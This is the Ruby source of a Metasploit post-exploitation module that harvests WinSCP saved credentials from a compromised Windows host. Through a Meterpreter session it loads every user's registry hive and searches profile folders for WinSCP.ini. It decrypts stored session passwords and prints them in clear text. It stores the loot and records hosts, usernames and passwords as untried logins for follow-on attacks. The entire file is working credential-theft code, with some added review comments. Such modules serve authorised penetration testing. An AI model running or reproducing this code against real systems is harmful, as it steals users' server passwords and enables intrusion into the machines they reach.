##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'rex/parser/ini'
require 'rex/parser/winscp'
require 'msf/core/auxiliary/report'
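class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::File
  include Rex::Parser::WinSCP

  # Registry path, relative to a user's HKU hive root, under which WinSCP
  # keeps its configuration and saved sessions.
  WINSCP_REG_BASE = 'Software\\Martin Prikryl\\WinSCP 2'

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Windows Gather WinSCP Saved Password Extraction',
      'Description'   => %q{
        This module extracts weakly encrypted saved passwords from
        WinSCP. It searches for saved sessions in the Windows Registry
        and the WinSCP.ini file. It cannot decrypt passwords if a master
        password is used.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'theLightCosine'],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))
  end

  # Enumerates every user hive (loading the ones not currently mounted) and
  # harvests the WinSCP sessions stored under
  # HKU\<SID>\Software\Martin Prikryl\WinSCP 2\Sessions.
  #
  # Hives mounted by this method are unloaded again even when a registry call
  # raises part way through, so the module never leaves an extra hive
  # attached on the target.
  def get_reg
    regexists = false
    userhives = load_missing_hives()

    begin
      userhives.each do |hive|
        next if hive['HKU'].nil?

        security_key = "#{hive['HKU']}\\#{WINSCP_REG_BASE}\\Configuration\\Security"
        masterpw = registry_getvaldata(security_key, 'UseMasterPassword')

        # No WinSCP Keys here.
        # NOTE(review): this treats a missing UseMasterPassword value as "no
        # WinSCP at all". If WinSCP omits the value when it is 0 (not verified
        # here), hives holding sessions but no Security key would be skipped;
        # confirm against a fresh install.
        next if masterpw.nil?

        regexists = true
        if masterpw == 1
          # Master Password used to add AES256 encryption to stored password
          print_error("User #{hive['HKU']} is using a Master Password, cannot recover passwords")
          next
        end

        harvest_registry_sessions(hive['HKU'])
      end
    ensure
      # Must run on every exit path: hives we mounted are ours to detach.
      unload_our_hives(userhives)
    end

    print_status("No WinSCP Registry Keys found!") unless regexists
  end

  # Entry point: probes the usual WinSCP.ini locations (each user profile and
  # the program directory), then falls back to registry storage.
  def run
    print_status("Looking for WinSCP.ini file storage...")

    # WinSCP is only x86...
    # NOTE(review): only the 32-bit program directory is probed on 64-bit
    # hosts; an ini next to a 64-bit install under %ProgramFiles% is missed.
    prog_files_env = sysinfo['Architecture'] == 'x86' ? 'ProgramFiles' : 'ProgramFiles(x86)'
    env = get_envs('APPDATA', prog_files_env, 'USERNAME')

    search_user_profiles(env['APPDATA'], env['USERNAME'])

    if env[prog_files_env]
      program_files = "#{env[prog_files_env]}\\WinSCP\\WinSCP.ini"
      get_ini(program_files) if file?(program_files)
    else
      vprint_error("#{prog_files_env} is not set in the session environment; skipping program directory lookup")
    end

    print_status("Looking for Registry storage...")
    get_reg
  end

  # Reads a WinSCP.ini from the target, keeps the raw file as loot, and
  # records every session it contains.
  #
  # @param file_path [String] path of the ini file on the target
  def get_ini(file_path)
    print_good("WinSCP.ini located at #{file_path}")

    file = read_file(file_path)
    if file.nil?
      print_error("Unable to read #{file_path}")
      return
    end

    stored_path = store_loot('winscp.ini', 'text/plain', session, file, 'WinSCP.ini', file_path)
    print_status("WinSCP saved to loot: #{stored_path}")

    # parse_ini comes from Rex::Parser::WinSCP; each entry is presumably a
    # hash keyed :hostname/:username/:password/:portnumber/:protocol, which
    # is what winscp_store_config reads.
    parse_ini(file).each { |res| winscp_store_config(res) }
  end

  # Prints a recovered credential and, when the host name resolves from the
  # target's point of view, records it in the database as an untried login.
  #
  # @param config [Hash] :hostname, :username, :password, :portnumber, :protocol
  def winscp_store_config(config)
    ip = nil
    begin
      res = client.net.resolve.resolve_host(config[:hostname], AF_INET)
      ip = res[:ip] if res
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Unable to store following credentials in database as we are unable to resolve the IP address: #{e}")
    ensure
      # Always shown, even when resolution failed, so the operator still sees
      # the recovered credential on the console.
      print_good("Host: #{config[:hostname]}, IP: #{ip}, Port: #{config[:portnumber]}, Service: #{config[:protocol]}, Username: #{config[:username]}, Password: #{config[:password]}")
    end

    # The service record below is keyed on the address; with no IP the
    # credential is reported but not persisted.
    return unless ip

    service_data = {
      address: ip,
      port: config[:portnumber],
      service_name: config[:protocol],
      protocol: 'tcp',
      workspace_id: myworkspace_id,
    }

    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: self.refname,
      private_type: :password,
      private_data: config[:password],
      username: config[:username]
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_login(login_data)
  end

  private

  # Decrypts and records every saved session holding a password under the
  # given hive root (e.g. "HKU\S-1-5-21-...").
  #
  # @param hku [String] registry root of the user's hive
  def harvest_registry_sessions(hku)
    sessions_key = "#{hku}\\#{WINSCP_REG_BASE}\\Sessions"
    saved_sessions = registry_enumkeys(sessions_key)
    return if saved_sessions.nil?

    savedpwds = false
    saved_sessions.each do |saved_session|
      # Skip default settings entry
      next if saved_session == "Default%20Settings"

      session_key = "#{sessions_key}\\#{saved_session}"
      encrypted_password = registry_getvaldata(session_key, 'Password')
      # There is no password saved for this session, so we skip it
      next if encrypted_password.nil?

      savedpwds = true
      user = registry_getvaldata(session_key, 'UserName') || ""
      host = registry_getvaldata(session_key, 'HostName') || ""
      fsprotocol = registry_getvaldata(session_key, 'FSProtocol') || ""
      # If no explicit port number entry exists, it is set to default port of tcp22
      # NOTE(review): 22 is only right for SSH-based protocols; an FTP or
      # WebDAV session saved without an explicit PortNumber would be recorded
      # on the wrong port. Confirm against parse_protocol's mapping.
      portnum = registry_getvaldata(session_key, 'PortNumber') || 22

      # The stored password is obfuscated with a key derived from user + host,
      # which is why both are fed to the decryptor.
      plaintext = decrypt_password(encrypted_password, "#{user}#{host}")

      winscp_store_config({
        hostname: host,
        username: user,
        password: plaintext,
        portnumber: portnum,
        protocol: parse_protocol(fsprotocol)
      })
    end

    print_status("No Saved Passwords found in the Session Registry Keys") unless savedpwds
  end

  # Looks for %APPDATA%\WinSCP.ini in every profile directory by swapping
  # each profile name into the current user's own %APPDATA% path.
  #
  # @param app_data_dir [String, nil] value of %APPDATA% in the session
  # @param current_user [String, nil] value of %USERNAME% in the session
  def search_user_profiles(app_data_dir, current_user)
    if app_data_dir.nil? || app_data_dir.empty? || current_user.nil? || current_user.empty?
      print_error("APPDATA or USERNAME is not set in the session environment; skipping per-user WinSCP.ini lookup")
      return
    end

    # %APPDATA% is <profiles>\<user>\AppData\Roaming on Vista+ and
    # <profiles>\<user>\Application Data on XP; climb up to <profiles>.
    user_dir = "#{app_data_dir}\\..\\.."
    user_dir << "\\.." if user_dir.include?('Users')

    # Match the single path component that is exactly the current user's
    # name (bounded by backslashes, case-insensitive like the file system).
    # The old gsub(USERNAME, user) rewrote every occurrence of the bare
    # username, so a user named e.g. "Data" or "Users" produced a bogus path
    # for every profile, and a nil USERNAME raised.
    profile_component = /\\#{Regexp.escape(current_user)}(?=\\)/i
    unless app_data_dir =~ profile_component
      # Profile folder name differs from %USERNAME% (renamed or domain
      # profile); only the current user's copy can be located reliably.
      probe_ini("#{app_data_dir}\\WinSCP.ini")
      return
    end

    Array(dir(user_dir)).each do |user|
      next if user == "." || user == ".."
      # Block form so backslashes in the replacement are taken literally.
      app_data = app_data_dir.sub(profile_component) { "\\#{user}" } + "\\WinSCP.ini"
      probe_ini(app_data)
    end
  end

  # Reports a candidate ini path and parses it if it exists on the target.
  #
  # @param path [String] candidate WinSCP.ini path
  def probe_ini(path)
    vprint_status("Looking for #{path}...")
    get_ini(path) if file?(path)
  end
end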